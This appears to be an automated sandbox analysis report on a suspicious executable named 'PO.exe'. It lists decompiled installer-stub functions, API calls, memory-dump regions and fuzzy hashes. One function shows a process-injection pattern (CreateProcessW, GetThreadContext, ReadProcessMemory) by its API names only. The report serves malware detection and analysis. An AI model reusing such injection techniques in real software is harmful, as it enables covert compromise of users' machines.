0x004015e8
0x004015ee
0x004015f6
0x004015fc
0x004015fe
0x00401601
0x00401609
0x00401616
0x00401623
0x00401623
0x00401618
0x00401619
0x00401621
0x00000000
0x00000000
0x00401621
0x00401616
0x00401626
0x00401629
0x0040162b
0x0040162c
0x004015ee
0x00401633
0x00401653
0x004021e8
0x00401635
0x00401637
0x00401642
0x00401648
0x00401648
0x00402932
0x0040293e

APIs

Part of subcall function 0040555F: CharNextA.USER32(00405315,?,007A0988,C:\Users\user\AppData\Local\Temp\,004055C3,007A0988,007A0988,?,?,00000000,00405315,?,"C:\Users\user\Desktop\PO.exe" ,00000000), ref: 0040556D
Part of subcall function 0040555F: CharNextA.USER32(00000000), ref: 00405572
Part of subcall function 0040555F: CharNextA.USER32(00000000), ref: 00405581

CreateDirectoryA.KERNELBASE(00000000,?,00000000,0000005C,00000000,000000F0), ref: 00401601
GetLastError.KERNEL32(?,00000000,0000005C,00000000,000000F0), ref: 0040160B
GetFileAttributesA.KERNELBASE(00000000,?,00000000,0000005C,00000000,000000F0), ref: 00401619
SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\AppData\Local\Temp,00000000,00000000,000000F0), ref: 00401648

Strings

C:\Users\user\AppData\Local\Temp, xrefs: 0040163D

Memory Dump Source

Source File: 00000000.00000002.242105595.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.242102559.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.242113369.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.242118014.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242146770.000000000077A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242152575.0000000000784000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242156902.0000000000788000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242164269.0000000000795000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242170391.00000000007A1000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242174688.00000000007A9000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242178100.00000000007AC000.00000002.00020000.sdmp Download File

Similarity

API ID: CharNext$Directory$AttributesCreateCurrentErrorFileLast
String ID: C:\Users\user\AppData\Local\Temp
API String ID: 3751793516-1943935188
Opcode ID: 8ad83ee49b934180a65c3f1f2490f938aa5d6732355b324bf936fc1135f131d3
Instruction ID: 09f96d0d66b1181939c381e70bae2dcc986a56c468c5fc90a5c01fc4095c1b0e
Opcode Fuzzy Hash: 8ad83ee49b934180a65c3f1f2490f938aa5d6732355b324bf936fc1135f131d3
Instruction Fuzzy Hash: B2010831908181ABDB212F695D449BF7BB0DA52364B28463BF8D1B22E2C63C4946D63E

Uniqueness

Uniqueness Score: -1.00%

Function 004056BF, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 32
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004056BF(char _a4, intOrPtr _a6, CHAR* _a8) {
				signed int _t11;
				int _t14;
				signed int _t16;
				void* _t19;
				CHAR* _t20;

				_t20 = _a4;
				_t19 = 0x64;
				while(1) {
					_t19 = _t19 - 1;
					_a4 = 0x61736e;
					_t11 = GetTickCount();
					_t16 = 0x1a;
					_a6 = _a6 + _t11 % _t16;
					_t14 = GetTempFileNameA(_a8,  &_a4, 0, _t20); // executed
					if(_t14 != 0) {
						break;
					}
					if(_t19 != 0) {
						continue;
					}
					 *_t20 =  *_t20 & 0x00000000;
					return _t14;
				}
				return _t20;
			}

0x004056c3
0x004056c9
0x004056ca
0x004056ca
0x004056cb
0x004056d2
0x004056dc
0x004056e9
0x004056ec
0x004056f4
0x00000000
0x00000000
0x004056f8
0x00000000
0x00000000
0x004056fa
0x00000000
0x004056fa
0x00000000

APIs

GetTickCount.KERNEL32 ref: 004056D2
GetTempFileNameA.KERNELBASE(?,0061736E,00000000,?,?,C:\Users\user\AppData\Local\Temp\,Error writing temporary file. Make sure your temp folder is valid.,00403148,"C:\Users\user\Desktop\PO.exe" ,C:\Users\user\AppData\Local\Temp\), ref: 004056EC

Strings

nsa, xrefs: 004056CB
Error writing temporary file. Make sure your temp folder is valid., xrefs: 004056BF
C:\Users\user\AppData\Local\Temp\, xrefs: 004056C2

Memory Dump Source

Source File: 00000000.00000002.242105595.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.242102559.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.242113369.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.242118014.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242146770.000000000077A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242152575.0000000000784000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242156902.0000000000788000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242164269.0000000000795000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242170391.00000000007A1000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242174688.00000000007A9000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242178100.00000000007AC000.00000002.00020000.sdmp Download File

Similarity

API ID: CountFileNameTempTick
String ID: C:\Users\user\AppData\Local\Temp\$Error writing temporary file. Make sure your temp folder is valid.$nsa
API String ID: 1716503409-768089442
Opcode ID: 1576e13395d2aa45966e3556d2b1d116b7b8b6eb636277a79ea70ab438a8cab6
Instruction ID: fc1e422234f16816b4991f84e515e98fc6b5cd585f65b5bef5412ac6235d785f
Opcode Fuzzy Hash: 1576e13395d2aa45966e3556d2b1d116b7b8b6eb636277a79ea70ab438a8cab6
Instruction Fuzzy Hash: F1F0A036748218BAE7104E55EC04B9B7FA9DF91760F14C02BFA089A1C0D6B1A95897A9

Uniqueness

Uniqueness Score: -1.00%

Function 02500034, Relevance: 6.6, APIs: 4, Instructions: 558processthreadCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE(?,00000000), ref: 02500387
GetThreadContext.KERNELBASE(?,00010007), ref: 025003AA
ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 025003CE

Memory Dump Source

Source File: 00000000.00000002.242361529.0000000002500000.00000040.00000001.sdmp, Offset: 02500000, based on PE: false

Similarity

API ID: Process$ContextCreateMemoryReadThread
String ID:
API String ID: 2411489757-0
Opcode ID: 19f0518768f88ab01d7a26dd38bf4ef9b3e610a7f2076a5ba949edfa7a927443
Instruction ID: da6d39b0dc0b7e0d1d9bd8d4e47fcc8f479a80ee9df76900d425e8844a176c86
Opcode Fuzzy Hash: 19f0518768f88ab01d7a26dd38bf4ef9b3e610a7f2076a5ba949edfa7a927443
Instruction Fuzzy Hash: F9321771E50218EEEB20CBA4DC85BEDBBB5BF44705F10449AE608FA2E0D7745A84DF19

Uniqueness

Uniqueness Score: -1.00%

Function 0040136D, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55
windowCOMMON

Download Yara Rule

C-Code - Quality: 73%

			E0040136D(signed int _a4) {
				intOrPtr* _t8;
				int _t10;
				signed int _t12;
				int _t13;
				int _t14;
				signed int _t21;
				int _t24;
				signed int _t27;
				void* _t28;

				_t27 = _a4;
				while(_t27 >= 0) {
					_t8 = _t27 * 0x1c +  *0x7a2fb0;
					__eflags =  *_t8 - 1;
					if( *_t8 == 1) {
						break;
					}
					_push(_t8); // executed
					_t10 = E00401439(); // executed
					__eflags = _t10 - 0x7fffffff;
					if(_t10 == 0x7fffffff) {
						return 0x7fffffff;
					}
					__eflags = _t10;
					if(__eflags < 0) {
						_t10 = E00405936(0x7a4000 - (_t10 + 1 << 0xa), 0x7a4000);
						__eflags = _t10;
					}
					if(__eflags != 0) {
						_t12 = _t10 - 1;
						_t21 = _t27;
						_t27 = _t12;
						_t13 = _t12 - _t21;
						__eflags = _t13;
					} else {
						_t13 = 1;
						_t27 = _t27 + 1;
					}
					__eflags =  *(_t28 + 0xc);
					if( *(_t28 + 0xc) != 0) {
						 *0x7a276c =  *0x7a276c + _t13;
						_t14 =  *0x7a2754;
						__eflags = _t14;
						_t24 = (0 | _t14 == 0x00000000) + _t14;
						__eflags = _t24;
						SendMessageA( *(_t28 + 0x18), 0x402, MulDiv( *0x7a276c, 0x7530, _t24), 0);
					}
				}
				return 0;
			}

0x0040136e
0x004013fb
0x00401382
0x00401384
0x00401387
0x00000000
0x00000000
0x00401389
0x0040138a
0x0040138f
0x00401394
0x00000000
0x00401409
0x00401396
0x00401398
0x004013a6
0x004013ab
0x004013ab
0x004013ad
0x004013b5
0x004013b6
0x004013b8
0x004013ba
0x004013ba
0x004013af
0x004013b1
0x004013b2
0x004013b2
0x004013bc
0x004013c1
0x004013c3
0x004013c9
0x004013d2
0x004013d7
0x004013d7
0x004013f5
0x004013f5
0x004013c1
0x00000000

APIs

MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E5
SendMessageA.USER32(00000402,00000402,00000000), ref: 004013F5

Strings

4@ , xrefs: 004013F1

Memory Dump Source

Source File: 00000000.00000002.242105595.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.242102559.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.242113369.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.242118014.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242146770.000000000077A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242152575.0000000000784000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242156902.0000000000788000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242164269.0000000000795000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242170391.00000000007A1000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242174688.00000000007A9000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242178100.00000000007AC000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSend
String ID: 4@
API String ID: 3850602802-2385517874
Opcode ID: a45d14e2091946de284817cfc568e15438f589f3a87ce7b3a313abe01bff308b
Instruction ID: c77d45609a211084429c3166b5231f0613d514cab4ec9a945a8c79bb8836a1de
Opcode Fuzzy Hash: a45d14e2091946de284817cfc568e15438f589f3a87ce7b3a313abe01bff308b
Instruction Fuzzy Hash: 9201DE726242109FE7184B39DD09B3B36D8E791314F00823EBA52E66F1E67CDC028B49

Uniqueness

Uniqueness Score: -1.00%

Function 00403116, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 20
COMMON

Download Yara Rule

C-Code - Quality: 84%

			E00403116(void* __eflags) {
				void* _t2;
				void* _t5;
				CHAR* _t6;

				_t6 = "C:\\Users\\alfons\\AppData\\Local\\Temp\\";
				E00405BFB(_t6);
				_t2 = E00405538(_t6);
				if(_t2 != 0) {
					E004054CC(_t6);
					CreateDirectoryA(_t6, 0); // executed
					_t5 = E004056BF("\"C:\\Users\\alfons\\Desktop\\PO.exe\" ", _t6); // executed
					return _t5;
				} else {
					return _t2;
				}
			}

0x00403117
0x0040311d
0x00403123
0x0040312a
0x0040312f
0x00403137
0x00403143
0x00403149
0x0040312d
0x0040312d
0x0040312d

APIs

Part of subcall function 00405BFB: CharNextA.USER32(?,*?|<>/":,00000000,Error writing temporary file. Make sure your temp folder is valid.,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403122,C:\Users\user\AppData\Local\Temp\,00000000,004031B2), ref: 00405C53
Part of subcall function 00405BFB: CharNextA.USER32(?,?,?,00000000,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403122,C:\Users\user\AppData\Local\Temp\,00000000,004031B2), ref: 00405C60
Part of subcall function 00405BFB: CharNextA.USER32(?,Error writing temporary file. Make sure your temp folder is valid.,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403122,C:\Users\user\AppData\Local\Temp\,00000000,004031B2), ref: 00405C65
Part of subcall function 00405BFB: CharPrevA.USER32(?,?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403122,C:\Users\user\AppData\Local\Temp\,00000000,004031B2), ref: 00405C75

CreateDirectoryA.KERNELBASE(C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031B2), ref: 00403137

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00403117, 0040311C, 00403122, 0040312E, 00403136, 0040313D
"C:\Users\user\Desktop\PO.exe" , xrefs: 0040313E

Memory Dump Source

Source File: 00000000.00000002.242105595.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.242102559.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.242113369.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.242118014.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242146770.000000000077A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242152575.0000000000784000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242156902.0000000000788000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242164269.0000000000795000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242170391.00000000007A1000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242174688.00000000007A9000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242178100.00000000007AC000.00000002.00020000.sdmp Download File

Similarity

API ID: Char$Next$CreateDirectoryPrev
String ID: "C:\Users\user\Desktop\PO.exe" $C:\Users\user\AppData\Local\Temp\
API String ID: 4115351271-4270557789
Opcode ID: 522d963e3f3a4f438d732b49ef20f3582027ff3f63ea88c6e0be8bfaf4fc7fbc
Instruction ID: 6026620382323fd49234fcc764212d1b2eb381da62286567b3783a1d3151fd3a
Opcode Fuzzy Hash: 522d963e3f3a4f438d732b49ef20f3582027ff3f63ea88c6e0be8bfaf4fc7fbc
Instruction Fuzzy Hash: 41D0A92100BD3130C581322A3C06FCF091C8F8732AB00413BF80DB40C24B6C2A828AFE

Uniqueness

Uniqueness Score: -1.00%

Function 00405690, Relevance: 3.0, APIs: 2, Instructions: 16
fileCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E00405690(CHAR* _a4, long _a8, long _a12) {
				signed int _t5;
				void* _t6;

				_t5 = GetFileAttributesA(_a4); // executed
				asm("sbb ecx, ecx");
				_t6 = CreateFileA(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
				return _t6;
			}

0x00405694
0x004056a1
0x004056b6
0x004056bc

APIs

GetFileAttributesA.KERNELBASE(00000003,00402C7D,C:\Users\user\Desktop,80000000,00000003,?,?,Error writing temporary file. Make sure your temp folder is valid.,004032AF,00000000,00000000,00000020), ref: 00405694
CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,Error writing temporary file. Make sure your temp folder is valid.,004032AF,00000000,00000000,00000020), ref: 004056B6

Memory Dump Source

Source File: 00000000.00000002.242105595.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.242102559.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.242113369.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.242118014.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242146770.000000000077A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242152575.0000000000784000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242156902.0000000000788000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242164269.0000000000795000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242170391.00000000007A1000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242174688.00000000007A9000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242178100.00000000007AC000.00000002.00020000.sdmp Download File

Similarity

API ID: File$AttributesCreate
String ID:
API String ID: 415043291-0
Opcode ID: c0d98c849f492b5a4774d0bea3b1d3ff5b36842139f7d17fd49bb2e6aa7f869d
Instruction ID: fda52db4846bf436787418750c042d71830ab65c4a714c5a55a7f97c147c79cf
Opcode Fuzzy Hash: c0d98c849f492b5a4774d0bea3b1d3ff5b36842139f7d17fd49bb2e6aa7f869d
Instruction Fuzzy Hash: 3BD09E71658301AFEF098F20DE16F2E7AA2EB84B01F10562CFA82940E0D6755C159B16

Uniqueness

Uniqueness Score: -1.00%

Function 004030CD, Relevance: 1.5, APIs: 1, Instructions: 22
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004030CD(void* _a4, long _a8) {
				int _t6;
				long _t10;

				_t10 = _a8;
				_t6 = ReadFile( *0x409020, _a4, _t10,  &_a8, 0); // executed
				if(_t6 == 0 || _a8 != _t10) {
					return 0;
				} else {
					return 1;
				}
			}

0x004030d1
0x004030e4
0x004030ec
0x00000000
0x004030f3
0x00000000
0x004030f5

APIs

ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,000000FF,?,00402F0D,000000FF,00000004,00000000,00000000,00000000), ref: 004030E4

Memory Dump Source

Source File: 00000000.00000002.242105595.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.242102559.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.242113369.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.242118014.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242146770.000000000077A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242152575.0000000000784000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242156902.0000000000788000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242164269.0000000000795000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242170391.00000000007A1000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242174688.00000000007A9000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242178100.00000000007AC000.00000002.00020000.sdmp Download File

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: f91aafd9ec9002b658fe048398ef4ecca8a0f43a27f2371a89b598af4e44343e
Instruction ID: 4fd4a8308e5d5898c176f95433ccaa972cd52e025ae54bcd1c8d1e1e5a7d5bbe
Opcode Fuzzy Hash: f91aafd9ec9002b658fe048398ef4ecca8a0f43a27f2371a89b598af4e44343e
Instruction Fuzzy Hash: FEE08C32611219BFCF105E559C01EE73F6CEB043A2F00C032F919E5190D630EA14EBA8

Uniqueness

Uniqueness Score: -1.00%

Function 004030FF, Relevance: 1.5, APIs: 1, Instructions: 6
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004030FF(long _a4) {
				long _t2;

				_t2 = SetFilePointer( *0x409020, _a4, 0, 0); // executed
				return _t2;
			}

0x0040310d
0x00403113

APIs

SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402E2A,?,?,?,Error writing temporary file. Make sure your temp folder is valid.,004032AF,00000000,00000000,00000020), ref: 0040310D

Memory Dump Source

Source File: 00000000.00000002.242105595.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.242102559.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.242113369.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.242118014.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242146770.000000000077A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242152575.0000000000784000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242156902.0000000000788000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242164269.0000000000795000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242170391.00000000007A1000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242174688.00000000007A9000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242178100.00000000007AC000.00000002.00020000.sdmp Download File

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: de52c7a2a910bc3da80fb7f00694c34356361307f5662ff296472372640bc7ed
Instruction ID: 25801f27feaadc63e0c23ae6d5f917682d27e8bc7d9ad1472eb802ffa7caf717
Opcode Fuzzy Hash: de52c7a2a910bc3da80fb7f00694c34356361307f5662ff296472372640bc7ed
Instruction Fuzzy Hash: E4B01232954300BFDA114B00DE05F057B72B758700F208030B340380F0C2712420DB0D

Uniqueness

Uniqueness Score: -1.00%

Function 004054F7, Relevance: 1.3, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004054F7(CHAR* _a4, intOrPtr _a8) {
				CHAR* _t3;
				char _t4;

				_t3 = _a4;
				while(1) {
					_t4 =  *_t3;
					if(_t4 == 0) {
						break;
					}
					if(_t4 != _a8) {
						_t3 = CharNextA(_t3); // executed
						continue;
					}
					break;
				}
				return _t3;
			}

0x004054f7
0x0040550a
0x0040550a
0x0040550e
0x00000000
0x00000000
0x00405501
0x00405504
0x00000000
0x00405504
0x00000000
0x00405501
0x00405510

APIs

CharNextA.USER32(?,00405C4D,*?|<>/":,00000000,Error writing temporary file. Make sure your temp folder is valid.,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403122,C:\Users\user\AppData\Local\Temp\,00000000,004031B2), ref: 00405504

Memory Dump Source

Source File: 00000000.00000002.242105595.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.242102559.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.242113369.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.242118014.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242146770.000000000077A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242152575.0000000000784000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242156902.0000000000788000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242164269.0000000000795000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242170391.00000000007A1000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242174688.00000000007A9000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242178100.00000000007AC000.00000002.00020000.sdmp Download File

Similarity

API ID: CharNext
String ID:
API String ID: 3213498283-0
Opcode ID: b411918ab1eb26758375c035e9adf1183577ea404a955402d598b5c9ffb07099
Instruction ID: 892fef8f78bee00eb476aaf619e1090be6f12fd30b71fe3201b25ceeba2b4cc3
Opcode Fuzzy Hash: b411918ab1eb26758375c035e9adf1183577ea404a955402d598b5c9ffb07099
Instruction Fuzzy Hash: B0C0807040C78177C5105760D9245677FE1AA91341F584896F0C563151D134B8509B3F

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00404EA0, Relevance: 66.8, APIs: 37, Strings: 1, Instructions: 277
windowclipboardmemoryCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E00404EA0(long _a4, long _a8, long _a12, unsigned int _a16) {
				struct HWND__* _v8;
				struct tagRECT _v24;
				void* _v32;
				signed int _v36;
				int _v40;
				CHAR* _v44;
				signed int _v48;
				int _v52;
				void* _v56;
				void* _v64;
				void* __ebx;
				void* __edi;
				void* __esi;
				long _t86;
				struct HMENU__* _t88;
				unsigned int _t91;
				int _t93;
				int _t94;
				void* _t100;
				intOrPtr _t123;
				struct HWND__* _t127;
				int _t148;
				int _t149;
				struct HWND__* _t153;
				struct HWND__* _t157;
				struct HMENU__* _t159;
				long _t161;
				CHAR* _t162;
				CHAR* _t163;

				_t153 =  *0x7a2764;
				_t148 = 0;
				_v8 = _t153;
				if(_a8 != 0x110) {
					if(_a8 == 0x405) {
						CloseHandle(CreateThread(0, 0, E00404E34, GetDlgItem(_a4, 0x3ec), 0,  &_a4));
					}
					if(_a8 != 0x111) {
						L16:
						if(_a8 != 0x404) {
							L24:
							if(_a8 != 0x7b || _a12 != _t153) {
								goto L19;
							} else {
								_t86 = SendMessageA(_t153, 0x1004, _t148, _t148);
								_a8 = _t86;
								if(_t86 <= _t148) {
									L36:
									return 0;
								}
								_t88 = CreatePopupMenu();
								_push(0xffffffe1);
								_push(_t148);
								_t159 = _t88;
								AppendMenuA(_t159, _t148, 1, E004059E1(_t148, _t153, _t159));
								_t91 = _a16;
								if(_t91 != 0xffffffff) {
									_t149 = _t91;
									_t93 = _t91 >> 0x10;
								} else {
									GetWindowRect(_t153,  &_v24);
									_t149 = _v24.left;
									_t93 = _v24.top;
								}
								_t94 = TrackPopupMenu(_t159, 0x180, _t149, _t93, _t148, _t153, _t148);
								_t161 = 1;
								if(_t94 == 1) {
									_v56 = _t148;
									_v44 = 0x79f580;
									_v40 = 0xfff;
									_a4 = _a8;
									do {
										_a4 = _a4 - 1;
										_t161 = _t161 + SendMessageA(_v8, 0x102d, _a4,  &_v64) + 2;
									} while (_a4 != _t148);
									OpenClipboard(_t148);
									EmptyClipboard();
									_t100 = GlobalAlloc(0x42, _t161);
									_a4 = _t100;
									_t162 = GlobalLock(_t100);
									do {
										_v44 = _t162;
										SendMessageA(_v8, 0x102d, _t148,  &_v64);
										_t163 =  &(_t162[lstrlenA(_t162)]);
										 *_t163 = 0xa0d;
										_t162 =  &(_t163[2]);
										_t148 = _t148 + 1;
									} while (_t148 < _a8);
									GlobalUnlock(_a4);
									SetClipboardData(1, _a4);
									CloseClipboard();
								}
								goto L36;
							}
						}
						if( *0x7a274c == _t148) {
							ShowWindow( *0x7a2f84, 8);
							if( *0x7a300c == _t148) {
								E00404D62( *((intOrPtr*)( *0x79ed58 + 0x34)), _t148);
							}
							E00403D80(1);
							goto L24;
						}
						 *0x79e950 = 2;
						E00403D80(0x78);
						goto L19;
					} else {
						if(_a12 != 0x403) {
							L19:
							return E00403E0E(_a8, _a12, _a16);
						}
						ShowWindow( *0x7a2750, _t148);
						ShowWindow(_t153, 8);
						E0040417A();
						goto L16;
					}
				}
				_v48 = _v48 | 0xffffffff;
				_v36 = _v36 | 0xffffffff;
				_v56 = 2;
				_v52 = 0;
				_v44 = 0;
				_v40 = 0;
				asm("stosd");
				asm("stosd");
				_t123 =  *0x7a2f88;
				_a8 =  *((intOrPtr*)(_t123 + 0x5c));
				_a12 =  *((intOrPtr*)(_t123 + 0x60));
				 *0x7a2750 = GetDlgItem(_a4, 0x403);
				 *0x7a2748 = GetDlgItem(_a4, 0x3ee);
				_t127 = GetDlgItem(_a4, 0x3f8);
				 *0x7a2764 = _t127;
				_v8 = _t127;
				E00403DDC( *0x7a2750);
				 *0x7a2754 = E004045FA(4);
				 *0x7a276c = 0;
				GetClientRect(_v8,  &_v24);
				_v48 = _v24.right - GetSystemMetrics(0x15);
				SendMessageA(_v8, 0x101b, 0,  &_v56);
				SendMessageA(_v8, 0x1036, 0x4000, 0x4000);
				if(_a8 >= 0) {
					SendMessageA(_v8, 0x1001, 0, _a8);
					SendMessageA(_v8, 0x1026, 0, _a8);
				}
				if(_a12 >= _t148) {
					SendMessageA(_v8, 0x1024, _t148, _a12);
				}
				_push( *((intOrPtr*)(_a16 + 0x30)));
				_push(0x1b);
				E00403DA7(_a4);
				if(( *0x7a2f90 & 0x00000003) != 0) {
					ShowWindow( *0x7a2750, _t148);
					if(( *0x7a2f90 & 0x00000002) != 0) {
						 *0x7a2750 = _t148;
					} else {
						ShowWindow(_v8, 8);
					}
				}
				_t157 = GetDlgItem(_a4, 0x3ec);
				SendMessageA(_t157, 0x401, _t148, 0x75300000);
				if(( *0x7a2f90 & 0x00000004) != 0) {
					SendMessageA(_t157, 0x409, _t148, _a12);
					SendMessageA(_t157, 0x2001, _t148, _a8);
				}
				goto L36;
			}

0x00404ea9
0x00404eaf
0x00404eb8
0x00404ebb
0x00405048
0x0040506c
0x0040506c
0x0040507f
0x0040509c
0x004050a3
0x004050fa
0x004050fe
0x00000000
0x00405105
0x0040510d
0x00405115
0x00405118
0x00405215
0x00000000
0x00405215
0x0040511e
0x00405124
0x00405126
0x00405127
0x00405133
0x00405139
0x0040513f
0x00405154
0x0040515a
0x00405141
0x00405146
0x0040514c
0x0040514f
0x0040514f
0x00405168
0x00405170
0x00405173
0x0040517c
0x0040517f
0x00405186
0x0040518d
0x00405195
0x00405195
0x004051ac
0x004051ac
0x004051b3
0x004051b9
0x004051c2
0x004051c9
0x004051d2
0x004051d4
0x004051d7
0x004051e0
0x004051ec
0x004051ee
0x004051f4
0x004051f5
0x004051f6
0x004051fe
0x00405209
0x0040520f
0x0040520f
0x00000000
0x00405173
0x004050fe
0x004050ab
0x004050db
0x004050e3
0x004050ee
0x004050ee
0x004050f5
0x00000000
0x004050f5
0x004050af
0x004050b9
0x00000000
0x00405081
0x00405087
0x004050be
0x00000000
0x004050c7
0x00405090
0x00405095
0x00405097
0x00000000
0x00405097
0x0040507f
0x00404ec1
0x00404ec5
0x00404ece
0x00404ed5
0x00404ed8
0x00404edb
0x00404ede
0x00404edf
0x00404ee0
0x00404ef9
0x00404efc
0x00404f06
0x00404f15
0x00404f1d
0x00404f25
0x00404f2a
0x00404f2d
0x00404f39
0x00404f42
0x00404f4b
0x00404f6e
0x00404f74
0x00404f85
0x00404f8a
0x00404f98
0x00404fa6
0x00404fa6
0x00404fab
0x00404fb9
0x00404fb9
0x00404fbe
0x00404fc1
0x00404fc6
0x00404fd2
0x00404fdb
0x00404fe8
0x00404ff7
0x00404fea
0x00404fef
0x00404fef
0x00404fe8
0x0040500c
0x00405015
0x0040501e
0x0040502e
0x0040503a
0x0040503a
0x00000000

APIs

GetDlgItem.USER32 ref: 00404EFF
GetDlgItem.USER32 ref: 00404F0E
